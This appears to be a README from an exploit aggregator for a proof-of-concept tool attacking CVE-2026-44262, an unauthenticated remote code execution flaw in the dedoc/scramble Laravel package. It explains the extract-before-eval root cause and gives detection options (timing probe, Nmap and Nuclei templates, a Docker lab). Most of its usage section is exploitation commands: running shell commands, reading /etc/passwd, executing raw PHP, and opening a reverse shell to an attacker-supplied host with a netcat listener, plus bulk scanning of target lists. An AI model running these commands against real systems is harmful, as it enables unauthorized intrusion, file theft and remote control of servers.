Share
## https://sploitus.com/exploit?id=6FCE9657-DE00-55DB-9A70-1660B9FAC8C6
dedoc/scramble RCE (CVE-2026-44262) PoC


    
    
      
    
    
      
    
    
      
    


## ๐Ÿ“œ Description

CVE-2026-44262 is an unauthenticated Remote Code Execution vulnerability in [dedoc/scramble](https://github.com/dedoc/scramble), a Laravel API documentation generator.

`NodeRulesEvaluator::doEvaluateExpression()` calls `extract($variables)` before `eval("return $code;")`. When a controller assigns `$request->input()` to a variable named `$code` and uses it as a validation rule, Scramble tracks that variable and passes it into the eval scope. An attacker can overwrite `$code` with arbitrary PHP by supplying a crafted query parameter to `/docs/api.json`.

**Affected versions:** `dedoc/scramble >=0.13.2, <0.13.22`

## โœจ Features

- **Auto-detection** โ€” scans OpenAPI spec to discover vulnerable parameters automatically
- **Timing probe** โ€” safe non-breaking check using `sleep()` to confirm eval fires
- **Command execution** โ€” run shell commands and capture output directly from the HTTP response
- **File read** โ€” read arbitrary files from the target filesystem
- **PHP code execution** โ€” execute raw PHP code via the RCE
- **Reverse shell** โ€” PHP `proc_open` reverse shell, no bash or busybox required
- **Bulk scanning** โ€” scan multiple targets from a file
- **OS detection** โ€” auto-detects Windows/Linux/Darwin and adjusts payloads accordingly
- **Nmap NSE** โ€” passive + timing detection script (`http-scramble-rce-detect.nse`)
- **Nuclei template** โ€” two-step detection with timing confirmation (`CVE-2026-44262.yaml`)

## ๐Ÿ› ๏ธ Installation

No external dependencies โ€” uses Python stdlib only.

### macOS / Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com
```

### Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com
```

## โš™๏ธ Usage

```
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--check]
                   [--command CMD] [--code PHP] [--read-file PATH] [--shell]
                   [--lhost HOST] [--lport PORT] [--os OS]
                   [--useragent USERAGENT] [--timeout SECONDS]
```

---

### Detection

```bash
# Full detection (timing + exec probe)
python3 CVE-2026-44262.py --target http://example.com

# Safe check only โ€” timing probe, no command execution
python3 CVE-2026-44262.py --target http://example.com --check

# Bulk scan
python3 CVE-2026-44262.py --targets targets.txt
```

---

### Exploitation

```bash
# Execute a command
python3 CVE-2026-44262.py --target http://example.com --command "whoami"

# Read a file
python3 CVE-2026-44262.py --target http://example.com --read-file /etc/passwd

# Execute raw PHP
python3 CVE-2026-44262.py --target http://example.com --code "echo php_uname();"

# Reverse shell (start: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com --shell --lhost 172.17.0.1 --lport 4444
```

---

### Nmap & Nuclei (passive + timing, no exploitation)

```bash
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com

# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com
```

## ๐Ÿ‹ Docker Lab

A self-contained Docker environment with the vulnerable app (dedoc/scramble v0.13.21) is included.
See [docker/DOCKER.md](docker/DOCKER.md) for details.

```bash
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000
```

## ๐Ÿ•ต๐Ÿผ References

- [dedoc/scramble](https://github.com/dedoc/scramble)
- [GitHub Advisory โ€” GHSA-4rm2-28vj-fj39](https://github.com/advisories/GHSA-4rm2-28vj-fj39)
- [NVD โ€” CVE-2026-44262](https://nvd.nist.gov/vuln/detail/CVE-2026-44262)
- [HackIndex.io โ€” CVE-2026-44262](https://hackindex.io/vulnerabilities/CVE-2026-44262)

## ๐Ÿ“ข Disclaimer

This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.